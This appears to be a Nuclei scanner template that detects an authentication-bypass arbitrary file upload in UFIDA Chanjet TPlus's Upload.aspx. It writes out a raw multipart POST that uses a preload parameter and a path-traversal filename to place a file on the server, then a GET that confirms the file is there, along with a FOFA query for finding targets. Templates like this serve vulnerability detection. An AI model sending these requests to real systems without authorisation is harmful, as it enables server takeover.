45 lines
1.7 KiB
YAML
Executable File
45 lines
1.7 KiB
YAML
Executable File
id: chanjet-tplus-fileupload
|
|
|
|
info:
|
|
name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
|
|
author: SleepingBag945
|
|
severity: high
|
|
description: |
|
|
There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
|
|
reference:
|
|
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20Upload.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
fofa-query: app="畅捷通-TPlus"
|
|
tags: yonyou,chanjet,upload,intrusive
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuirnbcvo
|
|
Accept-Encoding: gzip
|
|
|
|
------WebKitFormBoundaryuirnbcvo
|
|
Content-Disposition: form-data; name="File1"; filename="../../../img/login/{{randstr_1}}.jpg"
|
|
Content-Type: image/jpeg
|
|
|
|
{{randstr_2}}
|
|
------WebKitFormBoundaryuirnbcvo--
|
|
- |
|
|
GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept-Encoding: gzip
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code_1==200 && status_code_2==200"
|
|
- "contains(body_2, '{{randstr_2}}')"
|
|
condition: and
|
|
|
|
# digest: 490a00463044022012de43229b259c086073e539289bf25e7c5aa65aa4aaa77bc58f0455e9d03ed102203ebc53011716402b0163f7e8ff69137c7b9626d7cf51d0689de940f5660acc22:922c64590222798bb761d5b6d8e72950
|